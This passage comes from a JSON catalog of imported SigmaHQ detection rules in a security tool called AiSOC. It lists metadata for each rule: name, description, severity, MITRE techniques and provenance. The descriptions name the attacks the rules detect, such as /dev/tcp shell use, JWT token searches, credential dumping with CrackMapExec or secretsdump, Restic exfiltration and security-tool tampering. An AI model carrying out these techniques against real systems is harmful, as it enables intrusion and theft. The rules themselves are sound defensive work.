"AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" } }, { "id": "sigmahq-sigma-6c0a7755-6d31-44fa-80e1-133e57752680", "type": "detection", "name": "Windows Defender Threat Detection Service Disabled", "description": "Detects when the \"Windows Defender Threat Protection\" service is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-threat-detection-service-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c0a7755-6d31-44fa-80e1-133e57752680", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml" } }, { "id": "sigmahq-sigma-6c0ce3b6-85e2-49d4-9c3f-6e008ce9796e", "type": "detection", "name": "Suspicious Deno File Written from Remote Source", "description": "Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL.\nThis behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1204", "T1059.007", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-deno-file-written-from-remote-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c0ce3b6-85e2-49d4-9c3f-6e008ce9796e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_deno.yml" } }, { "id": "sigmahq-sigma-6c220477-0b5b-4b25-bb90-66183b4089e8", "type": "detection", "name": "Suspicious Inbox Forwarding", "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-inbox-forwarding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c220477-0b5b-4b25-bb90-66183b4089e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml" } }, { "id": "sigmahq-sigma-6c304b02-06e6-402d-8be4-d5833cdf8198", "type": "detection", "name": "Potential SentinelOne Shell Context Menu Scan Command Tampering", "description": "Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-sentinelone-shell-context-menu-scan-command-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c304b02-06e6-402d-8be4-d5833cdf8198", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_sentinelone_shell_context_tampering.yml" } }, { "id": "sigmahq-sigma-6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", "type": "detection", "name": "New Cron File Created", "description": "Detects the creation of cron files in Cron directories, which could indicate potential persistence mechanisms being established by an attacker.\nNote that not all cron file creations are malicious - legitimate system administration activities and software installations may also create cron files.\nThis detection should be investigated in context, considering factors such as the user creating the file, the timing of creation, and the contents of the cron job.\nFocus investigation on unexpected cron files created by non-administrative users or during suspicious timeframes.\nAdditionally, it is recommended to review the contents of the newly created cron files to assess their intent.\nFurthermore, it is suggested to baseline normal cron file creation and apply additional filters to reduce false positives based on the specific environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-cron-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_susp_cron_file_created.yml" } }, { "id": "sigmahq-sigma-6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "type": "detection", "name": "Powershell XML Execute Command", "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-xml-execute-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" } }, { "id": "sigmahq-sigma-6c6d9280-e6d0-4b9d-80ac-254701b64916", "type": "detection", "name": "Potential NTLM Coercion Via Certutil.EXE", "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ntlm-coercion-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" } }, { "id": "sigmahq-sigma-6c82cf5c-090d-4d57-9188-533577631108", "type": "detection", "name": "Microsoft Malware Protection Engine Crash - WER", "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1211", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-malware-protection-engine-crash-wer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c82cf5c-090d-4d57-9188-533577631108", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml" } }, { "id": "sigmahq-sigma-6c8fbee5-dee8-49bc-851d-c3142d02aa47", "type": "detection", "name": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/allow-service-access-using-security-descriptor-tampering-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml" } }, { "id": "sigmahq-sigma-6c96fc76-0eb1-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml" } }, { "id": "sigmahq-sigma-6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", "type": "detection", "name": "Okta Unauthorized Access to App", "description": "Detects when unauthorized access to app occurs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-unauthorized-access-to-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_unauthorized_access_to_app.yml" } }, { "id": "sigmahq-sigma-6cc5fceb-9a71-4c23-aeeb-963abe0b279c", "type": "detection", "name": "Suspicious Use of /dev/tcp", "description": "Detects suspicious command with /dev/tcp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-use-of-dev-tcp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_susp_dev_tcp.yml" } }, { "id": "sigmahq-sigma-6d3a3952-6530-44a3-8554-cf17c116c615", "type": "detection", "name": "Potentially Suspicious JWT Token Search Via CLI", "description": "Detects potentially suspicious search for JWT tokens via CLI by looking for the string \"eyJ0eX\" or \"eyJhbG\".\nJWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.\nThreat actors may search for these tokens to steal them for lateral movement or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-jwt-token-search-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d3a3952-6530-44a3-8554-cf17c116c615", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_jwt_token_search.yml" } }, { "id": "sigmahq-sigma-6d444368-6da1-43fe-b2fc-44202430480e", "type": "detection", "name": "Failed DNS Zone Transfer", "description": "Detects when a DNS zone transfer failed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/failed-dns-zone-transfer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d444368-6da1-43fe-b2fc-44202430480e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml" } }, { "id": "sigmahq-sigma-6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "type": "detection", "name": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-with-uncommon-or-suspicious-remote-tld.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml" } }, { "id": "sigmahq-sigma-6d580420-ff3f-4e0e-b6b0-41b90c787e28", "type": "detection", "name": "SharpHound Recon Sessions", "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sharphound-recon-sessions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" } }, { "id": "sigmahq-sigma-6d844f0f-1c18-41af-8f19-33e7654edfc3", "type": "detection", "name": "Cisco Local Accounts", "description": "Find local accounts being created or modified as well as remote authentication configurations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-local-accounts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d844f0f-1c18-41af-8f19-33e7654edfc3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_local_accounts.yml" } }, { "id": "sigmahq-sigma-6d8a7cf1-8085-423b-b87d-7e880faabbdf", "type": "detection", "name": "File Download Via Nscurl - MacOS", "description": "Detects the execution of the nscurl utility in order to download files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-nscurl-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d8a7cf1-8085-423b-b87d-7e880faabbdf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" } }, { "id": "sigmahq-sigma-6d8c3d20-a5e1-494f-8412-4571d716cf5c", "type": "detection", "name": "Communication To Uncommon Destination Ports", "description": "Detects programs that connect to uncommon destination ports", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-uncommon-destination-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6d8c3d20-a5e1-494f-8412-4571d716cf5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml" } }, { "id": "sigmahq-sigma-6da2c9f5-7c53-401b-aacb-92c040ce1215", "type": "detection", "name": "Use of W32tm as Timer", "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1124" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-w32tm-as-timer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_w32tm.yml" } }, { "id": "sigmahq-sigma-6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "type": "detection", "name": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-couldn-t-call-a-privileged-service-lsaregisterlogonprocess.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" } }, { "id": "sigmahq-sigma-6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "type": "detection", "name": "Winget Admin Settings Modification", "description": "Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winget-admin-settings-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_winget_admin_settings_tampering.yml" } }, { "id": "sigmahq-sigma-6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "type": "detection", "name": "File Deleted Via Sysinternals SDelete", "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-deleted-via-sysinternals-sdelete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" } }, { "id": "sigmahq-sigma-6ddff2e8-ea1a-45d0-8938-93dfc1d67ae7", "type": "detection", "name": "PUA - Restic Backup Tool Execution", "description": "Detects the execution of the Restic backup tool, which can be used for data exfiltration.\nThreat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.\nIf not legitimately used in the enterprise environment, its presence may indicate malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048", "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-restic-backup-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ddff2e8-ea1a-45d0-8938-93dfc1d67ae7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_restic.yml" } }, { "id": "sigmahq-sigma-6e22722b-dfb1-4508-a911-49ac840b40f8", "type": "detection", "name": "Suspicious Mstsc.EXE Execution With Local RDP File", "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-mstsc-exe-execution-with-local-rdp-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" } }, { "id": "sigmahq-sigma-6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "type": "detection", "name": "HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump", "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-potential-remote-credential-dumping-activity-via-crackmapexec-or-impack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml" } }, { "id": "sigmahq-sigma-6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", "type": "detection", "name": "Suspicious Execution via macOS Script Editor", "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1566.002", "T1059", "T1059.002", "T1204", "T1204.001", "T1553" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-via-macos-script-editor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" } }, { "id": "sigmahq-sigma-6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", "type": "detection", "name": "AWS GuardDuty Important Change", "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-guardduty-important-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml" } }, { "id": "sigmahq-sigma-6e78b74f-c762-4800-82ad-f66787f10c8a", "type": "detection", "name": "Potential Rcdll.DLL Sideloading", "description": "Detects potential DLL sideloading of rcdll.dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rcdll-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_rcdll.yml" } }, { "id": "sigmahq-sigma-6e78f90f-0043-4a01-ac41-f97681613a66", "type": "detection", "name": "OpenCanary - MSSQL Login Attempt Via Windows Authentication", "description": "Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1213" ], "log_source": 